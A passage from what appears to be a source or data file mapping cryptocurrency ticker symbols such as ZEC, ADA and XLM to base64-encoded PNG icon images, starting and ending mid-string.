crlo5cqCMKs1XGdFqAkTO+HxDAIJY1F0DkE9BiA8zwUZs7KycCNa5ZQhISE+5F4BNS1Izyh08IMGKRyzwXwwkjQ8e/Zs/sGDBytXrFjBTvEfFwEXqEpOTlZr16415tWmTZvUtGnTjG+WkUdJYeEqdfjw4V9g9AvMEVIckHKem5DeFbxy5cq23bt3t+C+FwPAeXkB8zMcyKdw14+/iPBck7W0tDRVVlb25/Xr1zcaBt7Vacx9cEQO2VvxGHzMyZOnjm3ZskUigPnR4uJiPTs7W3GEVq/+mqtbjG/btm0Yj5gfsYfRj8nk1zX29bG/8Hy8TvD8+vLAgQPVS5YsUTExsaq4uGQUqRi1WMJVfn6+OnToUCWub4FvtvPu3mB2A3oymBBOgPrTxqsX98JOPNP39/W545Ty8WPlRUlJyQ+FhYVn/DrM2KNjD6dt8sj/3684DdCZipb6qbq6+iSMOfxWPjrcfwF7MkJrLhVUDAAAAABJRU5ErkJggg==',
'ZEC': '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',
'OMG': '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',
'ADA': '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',
'HSR': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAABWWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp0aWZmPSJodHRwOi8vbnMuYWRvYmUuY29tL3RpZmYvMS4wLyI+CiAgICAgICAgIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgpMwidZAAAJW0lEQVRYCc1XCWwU1xn+31x72Ni7ro3NDcFGBqeEpi1BiRRcBQJp1FKR2KqiliNIJAIMJOWKaPA0iYCoaWhCG2IwkDYcrd0WRUBoKVHcNCIp4hCFRTSlqg14fWF7vdfMzryZ1/8fe40JoDZSpfatZt/M+//5z+//3xuA//Fg/06/EIJVVzdKd+JrbKx2suu6LqRIpPE2eQ2NVS4DJrJ8X3AWtwn8ggIG2O8uR7mbQF3XJV1nrr52/7TW5vg0ASzJmPAiwS1XLhqRZ7z61vcOM8YcitKGmoZHO6KdX9JUzRbCZa6L/wKCpmWePniYRXRAeaC7n9d3VwOmRKZ43quqfwp3EntTSQMkGfULjKZQARgcRWHv4YU2MPHCyoNV3FKXpFNpkCQJXNcFTfVBXr7/+8gTaaoECZrgNgNuyy15o+sfKpcqitiiyr3+jZufOOAPuq+R5TY3M/gDX9DpfHTWpIWkWNcb0BqQKh+fskrR7Ai3bY/P5QKGj/IfrNu/bF8p1PgqK2cCyaXIkqzsuCUCpJyEIpEPMHhzychQe7y3F1zbYsJhUFAUzMya/0A38eh6tUXznDn3pVYu3tOWjNsVAmxQVBViPclzRLsC2zO6vp1uvdGf3v50DIIsq/y3+z4dff5cS5XNM6gKZJ+qJhMpc/7Vf8TmusJ2HC7kgqKcjrHji36cMW1LkpnkcBCBXFlquxZb2d4anyArgjPQlGEFytay0lEX++LJEolJFhqlhYb533ten3cla8SgAQANMkC1s3xh3R4joS627BQmV6IEQ8Y0gTs25g8fQBAMWDCY49GyXtFsGGmkIfS8IbP8kO+XtiWqGah+FxxQJT/ImvWH+oZlc5GFUuF6+aiq6leur//1wzc6Uot7etp5Op3iyWScJxJ9LkcXJaZIaBDaIzNZliGVSopEInHLJVyvLZDNWHcMHAcc07D7UAYYqZQdi3dZibg9Z13NL54k5aTXwwA2FA+d15u7Nzu2wPwpVEaSIssM7cy4jpsE5qRQsERNxXGEJCssjPf9ESSfvdiADwMwCDK0QyiqZDguBhccVZYll0Da1ZZ4ORLp/H1FxfCkVFmpkxFiQ82+p5Mx+yHBONW1UJUAKyrJ31215KHwxPLitf6gel7zKx9JCvvLmAkFR6ZPnzR1wtiRk8aWFUweOSK//IGHJ04uKQmfBkHKgMuKCqZtXz34/nMTikcMe9XnCwK2Bg6MW0bCKd+57fAKYlSamnTeUH+y4PCR05tsx+rPMjqvam7r5HuLN1VXP2jU/mDfPeDkfssy+4BbMjor+ta+/J3VGGuThGTHioX1GcKNwCKiFGDkPPqShbO3/GzHsXmuk1PuYoWgIdB+vW+zvu5X
pheujz+OrLUMGIdh4tRnVMUHRcPzttasnxcl4ZgfmzsmCnZMFzI4s95YDPwYKBkvn4gIjWZN81LnKSewUkOi8bXZE/uEI+9wBD/FBDvOJHHCzoiPrjfHn1TefuN42Z//eGm1ZZuAOULnFDknXzn3ev3iHdt2X8X06GgU4YoyiiwKg872eOHWF9/9gIwlEAg0UVZk6O1NTKIoIwQ9bFA3pLF0aZ1aV/fMdlx901sY8qdcONtcZ6YdPyp38AVZVQWMGRNagyqdxx5703fs2GBTQkVeowIzbedevtB2/xA5ZBwagV4jbolvKO2zz9owaAKb1o8GAUr02tpaga+IJFYXPqIE5ELFjLvCTwyl9HeHQf75/b5sDXgc9Da3vaaIt/R066DqAf1WAjYjUKZ8eXRNX/eVmYZh52HKOMcuer0ltgVz+gFj3xjc70mcJwSd8weUmKKoRzIZ7lBnQF4qN1A1ba6RsorRwFssSCSi7OTJawFJMlWORUaywuEC0dnZBcqKNY+3LFuw6zXewV7ijoGhtLBO1Kmrl9RjmTT9hJizcSPBaCCEi3J6tu9ZuojSRPTsWLlo959aU7FiYNhMcCAuvFScObPTbtg74xXDsJYz4fYwRKdlcSUUyqP9FWDGrOmv+3OlK4DlhzRmmmm40ZXa8Kr+/miiO9h5UFl/s/GQKGm47AknenZgIJCN3PdSCWaSZ4j24aFzoZ6u1Pz2q4mcjmhiTLSlb1Q6aYVDBdo6qQr3gAUL7kuNHRuqVRXNq1EEkpNJi8K2aPsb0ebM5JxcLcx5P7oJZGaa8xNHI48c+c2ZOUd/d2YuXSeOXpgtmBjmYv+lnm1ZNoyfFK5o+Xui4tDh069kDLdU9bnYoJgdCAYAN7MXXtzy3b1ZL2gWzz61o+lGpzETu5V3ylFkVSosGWaMHJV/8fQn//y6hEXZn13mhMI5WJIypgz9Ja9xxu0X27TrBcs7DuX6IQevvt40ZDKWwM6Oe5Us5YV8F/e8tOKrrILZXgpwU/DmkeNC67GDohO4SaFJZiYjOtp60XmMLVXKILSE3NURc9uu33A7Wntw7vZmLGNML0IVDaLTUzJhQPRat5OxLAcjR8YJTdOgZHRoIyq3SG82Auga7Qk6X7Zg59uxG84zCEg62rFAjmKVlRdHzp5qnibJWAJohMD+QgcOz1V80xu4zrmbxEoiBBJi0BqWi5jSKBrUrFQ5AIFccai+Yfl81IVO6y4FdWDUIqJ1KLunaMNl3nGM237uclfJCwe6bct+yqf5vmI7JkejlFBhsDU3P1AT7zQyTEVXMe+BXIX5fIEHYz3pQknGhi/Ax23nvKyyy9gBfA4IJxhU/cNHFJwihULUImKxD2TVo9HkG3tOZzFco8Pm4Ni4+t0ZmHDgLuDZAPCg6XN+umvJoUGGgZtVT7+zKpWwHmEyT8kYu3CxsuHn7zx7/PN8Ax0V9d0s8QGefiPooEAXHSKJ0H0jeb+JpyI8IwAewHAni4f0NQemEq2iQqeShG1bDo1vb+sus7kBtmVphpkkf74ZjUaDRKdtn2R6peo5S6t3qGVaHKhncWDXieJPP7l6ors9fS9InsFERTqDQECBCaWFy3+4teqtTc8feKKrM7W/r8f04U43IBb58JuosCSvpXzyqG8vWzvrr9lzIOnIjiEpyC4RgigSAGf/Fk3ioXTzuNKCwY5HSEeEOcJxc0FmF4kvmbAv5OUFl4bCgTS2AK+iaB0bGGi4SQeCcic91+q1Qkec/VcHefUfChxScTffuOPiTTIA5W3oc/a+Cm8uVVzCDxMdDziCNeIHbGOWOGQmvmr8QO0H+RDC/8vtvwBO/LJ+/tIqbwAAAABJRU5ErkJggg==',
'XLM': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAABWWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp0aWZmPSJodHRwOi8vbnMuYWRvYmUuY29tL3RpZmYvMS4wLyI+CiAgICAgICAgIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgpMwidZAAAGP0lEQVRYCcVWfUwURxR/s7twch/yJR93YCriF1wV6lVBqBargWiwxpbDWm1jjRajtRpLk9qm5UhMGmvaVJtoQ9BiNS1CK/KhgopcrfzTalqN0GKBYNETVOAODs67293pzMLx4d2BRExfspnZefPe7zdv3nu7AP+zoAnGRwaDgfpkTCYT0mg0AnkXJxjD3R0BYfRFRay7RlqZ6EOOhNHr9YPAKQDK5SteS1yRuXHTu7s+Mnx+8PALdDclONJq6O1p2LlscXp6+sywWXO3xsTGrI58blqUWqNhFCoFnD1VcumzXduWYYwRETwEOzTjhqbjmlFwyeGGrF3ZCS8l5y5e9oo8ICAAACFgGcSTgQsKCZm3LmFZGAFv90bCa2hGo0PCLtnt2JPz5dtZm/e//maGXDVZxYuiIAJB6uuzsYIAEDwlxL/VYQ+nvnJzc10RG+F63BEg98mRh9ev37Lm5dS03TFarVBZXoXs3V2cQI4dvzARIiIjCQjGCoXCZ2qcVg1/XLleFxv71ASkEqPg2dlvKeT